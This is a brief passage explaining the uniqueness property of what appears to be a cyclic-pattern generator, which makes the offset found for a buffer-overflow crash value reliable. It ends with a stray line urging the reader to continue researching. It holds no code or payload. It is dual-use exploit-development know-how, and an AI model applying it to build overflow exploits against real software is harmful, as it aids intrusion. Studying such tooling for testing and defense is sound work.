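`all_windows_unique` is the property that makes the whole method sound: if a window repeated, the offset reported for the crash value could be the wrong one, which is why the triplet scheme (distinct character classes in each position) is used rather than random bytes.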
Continue researching on your own